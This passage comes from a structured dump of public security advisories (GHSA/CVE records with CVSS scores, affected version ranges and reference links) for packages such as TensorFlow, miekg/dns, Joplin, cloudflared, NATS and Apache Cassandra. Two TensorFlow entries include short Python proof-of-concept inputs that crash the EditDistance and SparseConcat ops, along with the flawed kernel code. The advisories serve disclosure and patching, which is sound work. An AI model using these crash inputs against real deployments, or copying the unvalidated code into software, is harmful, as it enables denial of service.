'https://lists.apache.org/thread.html/r55609613abab203a1f2c1f3de050b63ae8f5c4a024df0d848d6915ff@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rab740e5c70424ef79fd095a4b076e752109aeee41c4256c2e5e5e142@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0101'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-32'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'http://mail-archives.apache.org/mod_mbox/thrift-dev/201910.mbox/%3C277A46CA87494176B1BBCF5D72624A2A%40HAGGIS%3E'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:09:18Z', 'nvd_published_at': '2019-10-29T19:15:00Z'}" +1.4.0,GHSA-9jcx-pr2f-qvq5,2023-08-29T21:48:23Z,2021-05-18T18:34:25Z,,['CVE-2018-17419'],miekg/dns parsing error leads to nil pointer dereference and DoS,"An issue was discovered in `setTA` in `scan_rr.go` in the Miek Gieben DNS library before 1.0.10 for Go. A `dns.ParseZone()` parsing error causes a segmentation violation, leading to denial of service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/miekg/dns'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-17419'}, {'type': 'WEB', 'url': 'https://github.com/miekg/dns/issues/742'}, {'type': 'WEB', 'url': 'https://github.com/miekg/dns/pull/745/commits/f71d7d9d77d439b30a5e50900df5b1f988a50e5e'}, {'type': 'WEB', 'url': 'https://github.com/miekg/dns/commit/501e858f679edecd4a38a86317ce50271014a80d'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0028'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-11T00:44:23Z', 'nvd_published_at': None}" +1.4.0,GHSA-cgc7-mwp4-3ccx,2022-09-09T19:57:15Z,2021-05-07T16:29:05Z,,['CVE-2020-15930'],Cross-site Scripting in Joplin,An XSS issue in Joplin desktop allows arbitrary code execution via a malicious HTML embed tag.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'joplin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.190'}, {'fixed': '1.1.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15930'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/issues/3552'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/commit/57d750bc9aeb0f98d53ed4b924458b54984c15ff'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/releases/tag/v1.1.4'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/159316/Joplin-1.0.245-Cross-Site-Scripting-Code-Execution.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T12:42:46Z', 'nvd_published_at': '2020-09-24T19:15:00Z'}" +1.4.0,GHSA-m6wg-2mwg-4rfq,2023-02-14T00:12:15Z,2021-05-18T15:29:42Z,,['CVE-2020-8945'],GPGME Go wrapper contains Use After Free,"The proglottis Go wrapper before 0.1.1 for the GPGME library has a use-after-free, as demonstrated by use for container image pulls by Docker or CRI-O. This leads to a crash or potential code execution during GPG signature verification.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/proglottis/gpgme'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8945'}, {'type': 'WEB', 'url': 'https://github.com/proglottis/gpgme/pull/23'}, {'type': 'WEB', 'url': 'https://github.com/containers/image/commit/4c7a23f82ef09127b0ff28366d1cf31316dd6cc1'}, {'type': 'WEB', 'url': 'https://github.com/proglottis/gpgme/commit/92153bcb59bd2f511e502262c46c7bd660e21733'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0679'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0689'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0697'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1795838'}, {'type': 'PACKAGE', 'url': 'https://github.com/proglottis/gpgme'}, {'type': 'WEB', 'url': 'https://github.com/proglottis/gpgme/compare/v0.1.0...v0.1.1'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/H6P6SSNKN4H6GSEVROHBDXA64PX7EOED/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KDBT77KV3U7BESJX3P4S4MPVDGRTAQA2/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WXV7NZELYWRRCXATXU3FYD3G3WJT3WYM/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0096'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:00:21Z', 'nvd_published_at': '2020-02-12T18:15:00Z'}" +1.4.0,GHSA-v756-4whv-48vc,2021-07-29T18:13:50Z,2021-05-17T21:00:24Z,,['CVE-2020-7675'],Code Injection in cd-messenger,cd-messenger through 2.7.26 is vulnerable to Arbitrary Code Execution. User input provided to the `color` argument executed by the `eval` function resulting in code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'cd-messenger'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.7.26'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7675'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CDMESSENGER-571493'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T18:52:11Z', 'nvd_published_at': '2020-06-10T16:15:00Z'}" +1.4.0,GHSA-75f6-78jr-4656,2021-05-18T19:43:25Z,2021-05-21T14:25:08Z,,['CVE-2021-29564'],Null pointer dereference in `EditDistance`,"### Impact +An attacker can trigger a null pointer dereference in the implementation of `tf.raw_ops.EditDistance`: + +```python +import tensorflow as tf + +hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) +hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) +hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) +truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) +truth_values = tf.constant([], shape=[0], dtype=tf.float32) +truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) + +tf.raw_ops.EditDistance( + hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, + hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, + truth_values=truth_values, truth_shape=truth_shape, normalize=True) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/79865b542f9ffdc9caeb255631f7c56f1d4b6517/tensorflow/core/kernels/edit_distance_op.cc#L103-L159) has incomplete validation of the input parameters. + +In the above scenario, an attacker causes an allocation of an empty tensor for the output: + +```cc +OP_REQUIRES_OK(ctx, ctx->allocate_output(""output"", output_shape, &output)); +auto output_t = output->flat(); +output_t.setZero(); +``` + +Because `output_shape` has 0 elements, the result of `output->flat()` has an empty buffer, so calling `setZero` would result in a null dereference. + +### Patches +We have patched the issue in GitHub commit [f4c364a5d6880557f6f5b6eb5cee2c407f0186b3](https://github.com/tensorflow/tensorflow/commit/f4c364a5d6880557f6f5b6eb5cee2c407f0186b3). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75f6-78jr-4656'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29564'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f4c364a5d6880557f6f5b6eb5cee2c407f0186b3'}]","{'cwe_ids': ['CWE-476'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T19:43:25Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-hgwp-4vp4-qmm2,2023-03-02T21:10:45Z,2021-05-24T16:56:35Z,,['CVE-2020-24356'],Local Privilege Escalation in cloudflared,"In `cloudflared` versions < 2020.8.1 (corresponding to 0.0.0-20200820025921-9323844ea773 on pkg.go.dev) on Windows, if an administrator has started `cloudflared` and set it to read configuration files from a certain directory, an unprivileged user can exploit a misconfiguration in order to escalate privileges and execute system-level commands. The misconfiguration was due to the way that `cloudflared` reads its configuration file. One of the locations that `cloudflared` reads from (C:\etc\) is not a secure by default directory due to the fact that Windows does not enforce access controls on this directory without further controls applied. A malformed config.yaml file can be written by any user. Upon reading this config, `cloudflared` would output an error message to a log file defined in the malformed config. The user-controlled log file location could be set to a specific location that Windows will execute when any user logs in.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cloudflared'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20200820025921-9323844ea773'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cloudflared/security/advisories/GHSA-hgwp-4vp4-qmm2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24356'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cloudflared/commit/9323844ea773b1444460fa09295ab8c01a88d97e'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cloudflared'}]","{'cwe_ids': ['CWE-427'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T16:52:03Z', 'nvd_published_at': '2020-10-02T15:15:00Z'}" +1.4.0,GHSA-6j9c-grc6-5m6g,2021-05-18T22:44:01Z,2021-05-21T14:22:24Z,,['CVE-2021-29534'],CHECK-fail in SparseConcat,"### Impact +An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.SparseConcat`: + +```python +import tensorflow as tf +import numpy as np + +indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) +indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) +indices = [indices_1, indices_2] + +values_1 = tf.zeros([0], dtype=tf.int64) +values_2 = tf.zeros([0], dtype=tf.int64) +values = [values_1, values_2] + +shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) +shape_2 = tf.zeros([9], dtype=tf.int64) +shapes = [shape_1, shape_2] + +tf.raw_ops.SparseConcat(indices=indices, values=values, shapes=shapes, concat_dim=2) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/b432a38fe0e1b4b904a6c222cbce794c39703e87/tensorflow/core/kernels/sparse_concat_op.cc#L76) takes the values specified in `shapes[0]` as dimensions for the output shape: + +```cc +TensorShape input_shape(shapes[0].vec()); +``` + +The [`TensorShape` constructor](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L183-L188) uses a `CHECK` operation which triggers when [`InitDims`](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L212-L296) returns a non-OK status. + +```cc +template +TensorShapeBase::TensorShapeBase(gtl::ArraySlice dim_sizes) { + set_tag(REP16); + set_data_type(DT_INVALID); + TF_CHECK_OK(InitDims(dim_sizes)); +} +``` + +In our scenario, this occurs when adding a dimension from the argument results in overflow: + +```cc +template +Status TensorShapeBase::InitDims(gtl::ArraySlice dim_sizes) { + ... + Status status = Status::OK(); + for (int64 s : dim_sizes) { + status.Update(AddDimWithStatus(internal::SubtleMustCopy(s))); + if (!status.ok()) { + return status; + } + } +} + +template +Status TensorShapeBase::AddDimWithStatus(int64 size) { + ... + int64 new_num_elements; + if (kIsPartial && (num_elements() < 0 || size < 0)) { + new_num_elements = -1; + } else { + new_num_elements = MultiplyWithoutOverflow(num_elements(), size); + if (TF_PREDICT_FALSE(new_num_elements < 0)) { + return errors::Internal(""Encountered overflow when multiplying "", + num_elements(), "" with "", size, + "", result: "", new_num_elements); + } + } + ... +} +``` + +This is a legacy implementation of the constructor and operations should use `BuildTensorShapeBase` or `AddDimWithStatus` to prevent `CHECK`-failures in the presence of overflows. + +### Patches +We have patched the issue in GitHub commit [69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c](https://github.com/tensorflow/tensorflow/commit/69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6j9c-grc6-5m6g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29534'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c'}]","{'cwe_ids': ['CWE-754'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T22:44:01Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-hpmr-g4pq-jhgp,2021-04-23T18:47:21Z,2021-05-06T15:58:05Z,,['CVE-2021-23371'],Denial of service in chrono-node,This affects the package chrono-node before 2.2.4. It hangs on a date-like string with lots of embedded spaces.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'chrono-node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23371'}, {'type': 'WEB', 'url': 'https://github.com/wanasit/chrono/issues/382'}, {'type': 'WEB', 'url': 'https://github.com/wanasit/chrono/commit/98815b57622443b5c498a427210ebd603d705f4c'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CHRONONODE-1083228'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T21:50:04Z', 'nvd_published_at': '2021-04-12T13:15:00Z'}" +1.4.0,GHSA-hmm9-r2m2-qg9w,2023-08-30T18:06:49Z,2021-05-21T16:22:10Z,,[],Nil dereference in NATS JWT causing DoS of nats-server,"(This advisory is canonically ) + +## Problem Description + +The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. + +A malicious Account could create and sign a User JWT with a state not created by the normal tooling, such that decoding by the NATS JWT library (written in Go) would attempt a nil dereference, aborting execution. + +The NATS Server is known to be impacted by this. + + +## Affected versions + +#### JWT library + + * all versions prior to 1.1.0 + +#### NATS Server + + * Version 2 prior to 2.1.9 + + +## Impact + +#### JWT library + + * Programs would nil dereference and panic, aborting execution by default. + +#### NATS server + + * Denial of Service caused by process termination + + +## Workaround + +If your NATS servers do not trust any accounts which are managed by untrusted entities, then malformed User credentials are unlikely to be encountered. + + +## Solution + +Upgrade the JWT dependency in any application using it. + +Upgrade the NATS server if using NATS Accounts.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/nats-io/nats-server/v2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/nats-io/jwt'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nats-io/nats-server/security/advisories/GHSA-hmm9-r2m2-qg9w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26521'}, {'type': 'WEB', 'url': 'https://github.com/nats-io/jwt/pull/107'}, {'type': 'WEB', 'url': 'https://advisories.nats.io/CVE/CVE-2020-26521.txt'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VT67XCLIIBYRT762SVFBYFFTQFVSM3SI/'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2020/11/02/2'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:18:45Z', 'nvd_published_at': None}" +1.4.0,GHSA-24ww-mc5x-xc43,2021-05-05T19:22:12Z,2021-05-07T15:54:46Z,,['CVE-2020-13946'],Man-in-the-middle attack in Apache Cassandra,"In Apache Cassandra, all versions prior to 2.1.22, 2.2.18, 3.0.22, 3.11.8 and 4.0-beta2, it is possible for a local attacker without access to the Apache Cassandra process or configuration files to manipulate the RMI registry to perform a man-in-the-middle attack and capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and perform unauthorised operations. Users should also be aware of CVE-2019-2684, a JRE vulnerability that enables this issue to be exploited remotely.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.cassandra:cassandra-all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.12'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cassandra:cassandra-all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.18'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cassandra:cassandra-all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.22'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cassandra:cassandra-all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0'}, {'fixed': '3.11.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.cassandra:cassandra-all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0-beta1'}, {'fixed': '4.0-beta2'}]}], 'versions': ['4.0-beta1']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13946'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1fd117082b992e7d43c1286e966c285f98aa362e685695d999ff42f7@%3Cuser.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r718e01f61b35409a4f7a3ccbc1cb5136a1558a9f9c2cb8d4ca9be1ce@%3Cuser.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rab8d90d28f944d84e4d7852f355a25c89451ae02c2decc4d355a9cfc@%3Cuser.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcd7544b24d8fc32b7950ec4c117052410b661babaa857fb1fc641152%40%3Cuser.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210521-0005/'}]","{'cwe_ids': ['CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:22:12Z', 'nvd_published_at': '2020-09-01T21:15:00Z'}" +1.4.0,GHSA-8pww-pp5r-rff8,2023-09-05T23:32:19Z,2021-05-07T16:06:03Z,,['CVE-2020-7681'],Path Traversal in marscode,This affects all versionsup to and including version 1.0.1-0 of package marscode. There is no path sanitization in the path provided at `fs.readFile` in `index.js`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'marscode'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1-0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7681'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MARSCODE-590122'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T23:16:18Z', 'nvd_published_at': '2020-07-25T09:15:00Z'}" +1.4.0,GHSA-jgcr-fg3g-qvw8,2021-05-07T16:46:48Z,2021-05-10T15:18:17Z,,['CVE-2021-29262'],Improper permission handling in Apache Solr,"When starting Apache Solr versions prior to 8.8.2, configured with the SaslZkACLProvider or VMParamsAllAndReadonlyDigestZkACLProvider and no existing security.json znode, if the optional read-only user is configured then Solr would not treat that node as a sensitive path and would allow it to be readable. Additionally, with any ZkACLProvider, if the security.json is already present, Solr will not automatically update the ACLs.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.solr:solr-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.8.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29262'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/SOLR-15249'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1171f6417eeb6d5e1206d53e2b2ff2d6ee14026f8b595ef7d8a33b79@%3Coak-issues.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1e92a2eff6c47a65c4a6e95e809a9707181de76f8062403a0bea1012@%3Coak-issues.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r51b29ff62060b67bc9999ded5e252b36b09311fe5a02d27f6de3e4d3@%3Coak-issues.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r536da4c4e4e406f7843461cc754a3d0a3fe575aa576e2b71a9cd57d0%40%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7151081abab92a827a607205c4260b0a3d22280b52d15bc909177608@%3Coak-issues.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 